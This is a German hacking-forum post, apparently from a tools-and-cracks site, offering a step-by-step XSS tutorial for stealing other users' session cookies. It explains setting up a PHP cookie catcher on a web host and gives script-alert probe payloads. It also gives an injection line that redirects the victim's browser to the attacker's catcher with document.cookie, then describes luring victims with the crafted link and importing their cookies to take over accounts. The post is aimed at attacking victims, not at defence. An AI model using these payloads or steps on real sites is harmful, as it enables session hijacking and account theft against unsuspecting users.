Zum Inhalt wechseln

Willkommen Gast

Navigation

Links

   

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

Foto

[TUT] XSS Tutorial by PaulaAbdul

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
PaulaAbdul

PaulaAbdul

    Favoured Management

  • Moderator
  • Likes
    2.941
  • 1.954 Beiträge
  • 2450 Bedankt
  • 1337-699
  • verifiziert
  • Android [root]
  • Windows, Linux

*
BELIEBT

XSS Tutorial by PaulaAbdul

Einleitung

In diesem Tutorial zeige ich euch, wie sich durch eine XSS-Lücke die Cookies eines Vics abfangen lassen. Dadurch ist es möglich die Kontrolle über User Accounts zu erhalten.


Was kann man mit Cookies anstellen?

Cookies werden lokal im Browser gespeichert und können somit von uns editiert werden. Durch die Manipulation der Browser Cookies können sogenannte Login-Sessions übernommen werden. Man gibt der vuln Website also vor, bereits eingeloggt zu sein. Das ganze wird auch als Session Hijacking bezeichnet.


Los gehts:

Registriere dich zuerst bei einem Webhoster deiner Wahl (natürlich mit php). Lade anschließend den folgenden Cookie Catcher herunter und uploade ihn mit Hilfe eines FTP Programms beim Webhoster. Anschließend erstellt ihr eine leere Datei cookies.php und setzt für die Datei Schreibrechte (CHMOD 777). Wie das z.B. mit dem FTP Programm Filezilla funktioniert seht ihr hier:
 


Please Login or Register to see this Hidden Content



Der Cookie Catcher grabbt die Cookies, IP-Adresse, den Referral Link sowie Uhrzeit & Datum und schreibt sie in die zuvor erstellte Datei cookies.php . Beide Dateien müssen sich im selben Verzeichniss befinden.


Vulnerable Sites finden & testen:

Wir brauchen nun also eine Seite, die verwundbar ist:

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.

 
Wenn Javascript in deinem Browser deaktiviert ist solltest du es an dieser Stelle aktivieren.
Um zu testen, ob eine Seite vuln ist, können wir folgende Codeschnipsel in das zu testende Formularfeld eintippen:
 
"><script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
"><script>alert("XSS")</script>
'><script>alert("XSS")</script>
><script>alert("XSS")</script>
<script>alert("XSS")</script>
Alternativ zu den Anführungszeichen " können auch auch einfache Anführungszeichen (links) verwendet werden: '
Wenn beim Testen nun also eine Popup-Meldung erscheint wie im folgenden Beispiel, ist die Seite vulnerable.




Grabben der Cookies:

Wenn die Seite also vuln ist, versuchen wir nun durch Eingabe des folgenden Codeschnipsels in das Formularfeld die Cookies zu grabben (http:/ /domain.com/catcher.php muss natürlich mit dem Link zum hochgeladenen Script ersetzt werden).
 
<script>document.location="http:/ /domain.com/catcher.php?c="+document.cookie</script>
Um zu sehen ob wir Erfolg hatten können wir nun http:/ /domain.com/cookies.php im Browser aufrufen. Darin sollten sich jetzt die Cookies befinden.


Umsetzung:

Um die Cookies eines Users abzufangen, muss dieser einen Link aufrufen, der den Codeschnipsel bereits beinhaltet. Der Link kann in der Regel einfach nach der Eingabe des Schadcodes in das Formularfeld aus der Adressleiste des Browsers kopiert werden.

Zum Verwalten und editieren der Browser Cookies installierst du dir am besten ein Browser Addon. Für Firefox ist z.B. der

Please Login or Register to see this Hidden Content

zu empfehlen. Mit Hilfe des Addons kannst du die erbeuteten Cookies nun hinzufügen.

Ein erneuter Aufruf der vuln Website wird dir nun zeigen, dass du bereits im Account des Victims eingeloggt bist.


> Mission complete!


Dieses Tutorial hat sich nicht von selbst geschrieben. Bei Weitergabe oder Veröffentlichung bitte ich deshalb um einen Verweis zu http://www.toolbase.me :)

Bearbeitet von PaulaAbdul, 19 Februar 2017 - 16:00 Uhr.
Cookie Catcher reupped

  • Imperial, White-Warti, Cube und 16 anderen gefällt das

.

signatur_pabdul2s1jbx.png


Thanked by 52 Members:
SecurityFlaw , kakao1 , Jozu , JohnR , raakil , kingkev0 , xxxsmackxxx , ZeroFreez , J0cker , ToWFiNiT , Jackson , Coder , Skyler , RudolfAntal , Netwxrk , Flex.Net , mantwohouse , Babo187 , abramas , zepsus , saske46 , H3lium , jacov , HellYeah , Bus1ness Junkie , Albus , nwo , codec4 , smc2014 , Rennsteak , Lykaner112 , 123kimiya123 , Dope , BioLord2013 , tr0p1c , tschilben , Omnipräsent , br0nks , hit , 4cyberbase , Alpha63 , Thesolution247 , jeff , verzweifelt , Iron , Unkiii , BauerIvan , Dagi40 , corkscrew , White-Warti , sub0 , midn84ever


  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen: 0

Mitglieder: 0, Gäste: 0, unsichtbare Mitglieder: 0


Dieses Thema wurde von 216 Mitglied(ern) gelesen


    , , _)_, ###, 123kimiya123, 4cyberbase, aaerix, abramas, Albus, alfjunior, Alpha63, alterego-59, Amigo, Amphe1337, and6578, argentlo, AvdeXg, b0kerst3l, B1nary, Babo187, back2hack, BackBurner, Bad Grandpa, bebekid32, berlingo21, BioLord2013, Blackrock, BlackZetsu, blizzard1904, Bojka, Botmopp, br0nks, Bragi, buffer-overflow, bukaterian, Bus1ness Junkie, Butt3rs, C.I.K, Caruso, Ch!ller, chimchoca7, cls, Cocarando, codec4, Coder, corkscrew, creamfresh, Creo, Cube, curlz, Dagi40, DarkSky, Deny-dz, dervonheute, done65, Dope, dorich75, Download305, Dr. p0rk, Drizzle, dts1, dun, dynaoh, Eester, Emalik Xantier, EncepT, eskalation, FalkE, filo, Framerater, G-Raz0r, gutzuu, H3lium, hackeris, harlek1n, HarryPotter, headshotde, heckerhere, Heinokel0903, hellboybmt, HellYeah, hikhack7, hit, igorborisvas, ikar, Imperial, Interimere, Internets, INTERSPACECOWBOY, Iron, J0cker, jabba, Jackson, jacov, jager52, Janjij, Jar3d, jeff, jnxz, Jochens, JohnR, johny758, Jozu, Kaase, Kaban, kakao1, Kalasch, KeldorB, killer6508, kingkev0, kollegah25, Kutusow, LearningbyDoing, Lilwayne11833, lNobodyl, lolorollo, Lucifer8x, Lykaner112, Macy1967, man, Maximalx3, maximaxi, me6, Methyl, mewue, midn84ever, milton3453, mindblow, mogel, most_uniQue, MrTube, ms8634, MulderFX, mxtrn, N0Name, n4pst3r, nEOx04, nischke, notinsane, nwo, omnicrunch, Omnipräsent, On3byT, oreagel, Osed28, PaulaAbdul, paulaner, Pentoman, peppi200, peterhanswurst3456, psy86, raakil, rastalani, RazoR', ref0rm, Rennsteak, rookyy66, rsneumann, RudolfAntal, S1lent, S4lent, samuraisxmali, saske46, Sayco, saynthng, schildkrieg4, SecurityFlaw, Sharky, Shego, shok0, Silent0wn3r, Skyler, sm1lie, smc2014, Smokyjoe, sngglr, spawn1911, Stech3r, stoneserv, sub0, synnergy, T00LStar, t33t86, Tabasco, Take1T, thaJack, the.3nd, Thesolution247, tinarchin, ToWFiNiT, tr0p1c, Traxx, Tron, tschilben, tybor, UDXR, Unkiii, ValleX, venom, verzweifelt, Veyron, weißnicht, White-Warti, whois, x1z0ng, Xantar, Xenio, xlF1N4L, xMarvvx, xxxsmackxxx, XYtarget, youngh4cker, zepsus, Zero-X, ZeroFreez, Zorrez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.